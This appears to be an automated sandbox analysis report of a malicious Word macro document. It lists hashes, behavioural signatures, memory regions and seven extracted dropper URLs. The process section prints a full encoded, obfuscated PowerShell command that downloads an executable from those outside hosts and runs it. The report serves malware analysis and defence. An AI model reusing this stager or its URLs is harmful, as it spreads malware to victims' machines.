Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    25/09/2024, 17:13

General

  • Target

    f67aa05b9fc33a12c4f1e7e8141ad365_JaffaCakes118.doc

  • Size

    198KB

  • MD5

    f67aa05b9fc33a12c4f1e7e8141ad365

  • SHA1

    02e8f0c433eb79f69dbfaa90366491cf04b72bd3

  • SHA256

    cdbbf8c834f089d9e2fc8ef834f7495eba2af2b781871327559d931b7e83c0dd

  • SHA512

    329b64367b4871ef8924c0a1f561c3e706ab6e1b7d3c1c0c17143366783ef6d40ad7d5b64138199e9d51d5c7709c03f935ecdbc5b3332688044c67a1693c612b

  • SSDEEP

    3072:9WKWj22TWTogk079THcpOu5UZI5EcbWD+Wzr:y/TX07hHcJQ+EcKDBzr

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://haymetetrading.com/wp-includes/yGELKj4/

exe.dropper

http://simofferbd24.com/wp-includes/fsiQc/

exe.dropper

http://401kplansinfo.com/cgi-bin/KtFRk/

exe.dropper

http://fidelityguide.com/cgi-bin/VA/

exe.dropper

https://sirnakmidyeci.com/wp-includes/qk9wW2/

exe.dropper

https://subitocarne.com/wp-content/ByeOAt9/

exe.dropper

https://eliesalibaarchitect.com/wordpress/T/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f67aa05b9fc33a12c4f1e7e8141ad365_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -en JABVAGUAdgB3AHoAZwB6AD0AKAAoACcAQgAnACsAJwBrAG4AdAAnACkAKwAoACcANAA1ACcAKwAnAHAAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AVgA6AHUAcwBFAHIAcAByAE8ARgBpAGwAZQBcAHkAdgAzAFcAbQA5AGcAXAB3AFoATgA3ADgAZQA4AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAGUAQwBUAG8AUgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBgAFUAcgBJAGAAVABZAFAAYABSAE8AdABPAEMAYABvAGwAIgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAdAAnACsAKAAnAGwAJwArACcAcwAxADEALAAgAHQAJwApACsAJwBsACcAKwAnAHMAJwApADsAJABRADMAeQB3AGkAbwBvACAAPQAgACgAKAAnAFQAJwArACcAaQBpACcAKQArACgAJwAwACcAKwAnAGIAYwAnACkAKwAnAHAAJwApADsAJABFAGYAZQA1AHEAegA5AD0AKAAnAFcAJwArACgAJwB6ACcAKwAnADUAZAA0ACcAKQArACcANABlACcAKQA7ACQAQgBuAHAAXwBzADUAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnAGcAJwArACcAUQBXAFkAJwArACcAdgAzACcAKQArACcAdwAnACsAJwBtACcAKwAnADkAZwAnACsAKAAnAGcAUQAnACsAJwBXACcAKQArACgAJwBXAHoAJwArACcAbgA3ACcAKQArACcAOABlACcAKwAoACcAOABnAFEAJwArACcAVwAnACkAKQAuACIAcgBlAHAAYABsAGAAQQBjAGUAIgAoACgAWwBDAGgAQQByAF0AMQAwADMAKwBbAEMAaABBAHIAXQA4ADEAKwBbAEMAaABBAHIAXQA4ADcAKQAsAFsAcwBUAFIASQBOAEcAXQBbAEMAaABBAHIAXQA5ADIAKQApACsAJABRADMAeQB3AGkAbwBvACsAKAAnAC4AJwArACgAJwBlAHgAJwArACcAZQAnACkAKQA7ACQAWABzAHQAYgB1AHgAcgA9ACgAKAAnAEcAZAAnACsAJwBlACcAKQArACgAJwB5ADcAMAAnACsAJwA5ACcAKQApADsAJABUAHIANwB5ADAAZQBnAD0AJgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABDAHgAZQBhAGsAcgBxAD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAA6AC8ALwBoAGEAeQAnACsAJwBtAGUAdABlAHQAcgAnACsAJwBhAGQAaQBuAGcALgAnACkAKwAoACcAYwBvAG0AJwArACcALwB3AHAALQBpAG4AJwArACcAYwBsAHUAJwArACcAZABlACcAKQArACgAJwBzACcAKwAnAC8AeQBHACcAKQArACcARQBMACcAKwAoACcASwBqACcAKwAnADQALwAqACcAKwAnAGgAdAB0AHAAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAHMAJwApACsAJwBpAG0AJwArACcAbwAnACsAJwBmAGYAJwArACgAJwBlAHIAJwArACcAYgBkACcAKQArACgAJwAyADQALgAnACsAJwBjAG8AbQAnACkAKwAoACcALwB3ACcAKwAnAHAALQBpACcAKQArACgAJwBuAGMAbAB1ACcAKwAnAGQAZQAnACkAKwAnAHMAJwArACgAJwAvAGYAJwArACcAcwBpAFEAYwAnACkAKwAnAC8AKgAnACsAJwBoAHQAJwArACgAJwB0AHAAOgAvACcAKwAnAC8ANAAwADEAawBwAGwAYQAnACsAJwBuACcAKwAnAHMAJwArACcAaQBuAGYAbwAnACkAKwAoACcALgBjAG8AJwArACcAbQAnACkAKwAoACcALwBjACcAKwAnAGcAaQAnACkAKwAnAC0AYgAnACsAKAAnAGkAbgAnACsAJwAvAEsAJwArACcAdABGAFIAawAvACoAJwArACcAaAB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAGYAaQAnACsAJwBkAGUAbAAnACsAJwBpAHQAeQAnACkAKwAoACcAZwB1AGkAJwArACcAZABlAC4AYwAnACsAJwBvAG0ALwAnACkAKwAnAGMAJwArACcAZwBpACcAKwAnAC0AJwArACgAJwBiAGkAbgAnACsAJwAvACcAKQArACgAJwBWAEEALwAnACsAJwAqAGgAdAAnACsAJwB0AHAAcwAnACsAJwA6AC8ALwAnACkAKwAoACcAcwAnACsAJwBpAHIAbgBhAGsAbQBpACcAKwAnAGQAeQAnACsAJwBlACcAKQArACgAJwBjAGkAJwArACcALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACkAKwAoACcAdwAnACsAJwBwAC0AJwApACsAJwBpAG4AJwArACcAYwAnACsAJwBsACcAKwAnAHUAZAAnACsAKAAnAGUAJwArACcAcwAvAHEAJwApACsAJwBrACcAKwAnADkAdwAnACsAKAAnAFcAMgAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACgAJwB0AHAAcwA6ACcAKwAnAC8ALwBzAHUAYgAnACkAKwAoACcAaQB0AG8AYwBhAHIAJwArACcAbgBlACcAKQArACcALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAJwArACgAJwBwAC0AYwBvACcAKwAnAG4AdABlACcAKwAnAG4AJwApACsAKAAnAHQALwAnACsAJwBCAHkAZQBPAEEAJwArACcAdAAnACkAKwAoACcAOQAvACcAKwAnACoAaAB0AHQAJwArACcAcABzADoAJwApACsAKAAnAC8ALwBlAGwAJwArACcAaQBlAHMAJwApACsAKAAnAGEAbAAnACsAJwBpAGIAJwApACsAKAAnAGEAYQAnACsAJwByAGMAJwApACsAKAAnAGgAaQB0ACcAKwAnAGUAJwArACcAYwB0ACcAKwAnAC4AYwBvAG0ALwB3ACcAKwAnAG8AcgBkAHAAcgBlACcAKwAnAHMAcwAnACsAJwAvAFQALwAnACkAKQAuACIAcwBgAFAATABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABTAHIAcAB1AGIANgA1AD0AKAAoACcASQA2AHoAJwArACcAZABfACcAKwAnAGwAJwApACsAJwByACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFEAZQBjAGcAdAA0AHkAIABpAG4AIAAkAEMAeABlAGEAawByAHEAKQB7AHQAcgB5AHsAJABUAHIANwB5ADAAZQBnAC4AIgBEAG8AYABXAG4AYABMAE8AQQBEAGYAaQBsAEUAIgAoACQAUQBlAGMAZwB0ADQAeQAsACAAJABCAG4AcABfAHMANQB2ACkAOwAkAEMAcgBjAHQAdABuAHYAPQAoACgAJwBSAGMAJwArACcAdQBtACcAKQArACcAdQAnACsAJwBrAHgAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEIAbgBwAF8AcwA1AHYAKQAuACIATABlAGAATgBgAEcAVABIACIAIAAtAGcAZQAgADMANwA5ADcANgApACAAewAmACgAJwBJAG4AdgBvAGsAJwArACcAZQAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACgAJABCAG4AcABfAHMANQB2ACkAOwAkAEMAbgBtAG4AdgAxAGIAPQAoACcARQAxACcAKwAoACcAegAwAG4AYwAnACsAJwA5ACcAKQApADsAYgByAGUAYQBrADsAJABFAHUAbwA4AG8AaABuAD0AKAAnAFcAJwArACgAJwA3AF8AbAByACcAKwAnADQAYwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVQBtADgAMABmAHYAdAA9ACgAKAAnAEEAJwArACcANgBtACcAKQArACcAeAA3ACcAKwAnAHYAbAAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2848

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      00b87d166f65989cd40f13d082df19db

      SHA1

      0554736673b7d647b36f62e93c55dc89d50ed1c8

      SHA256

      acaa010a9ef2b5606c7ef3dfc218f631373d49202516fd2157f0610797933c6a

      SHA512

      a5621d0e84cfdca13ea317243173889173a467828f21ef171426fca6f238b38918b3f5ae9bd30c80c60a83c9089437cccb28f6c5c824e8de1007193ea318f5c4

    • memory/2552-25-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-11-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-5-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-6-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-7-0x0000000005F30000-0x0000000006030000-memory.dmp

      Filesize

      1024KB

    • memory/2552-20-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-21-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-19-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-18-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-17-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-16-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-15-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-13-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-12-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-0-0x000000002FBE1000-0x000000002FBE2000-memory.dmp

      Filesize

      4KB

    • memory/2552-10-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-9-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-8-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-2-0x000000007144D000-0x0000000071458000-memory.dmp

      Filesize

      44KB

    • memory/2552-14-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-31-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-23-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-22-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-26-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-30-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-24-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-29-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-28-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-27-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-32-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-61-0x000000007144D000-0x0000000071458000-memory.dmp

      Filesize

      44KB

    • memory/2552-60-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2552-40-0x000000007144D000-0x0000000071458000-memory.dmp

      Filesize

      44KB

    • memory/2552-41-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-42-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-43-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-44-0x00000000007C0000-0x00000000008C0000-memory.dmp

      Filesize

      1024KB

    • memory/2552-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2848-38-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB

    • memory/2848-39-0x0000000002250000-0x0000000002258000-memory.dmp

      Filesize

      32KB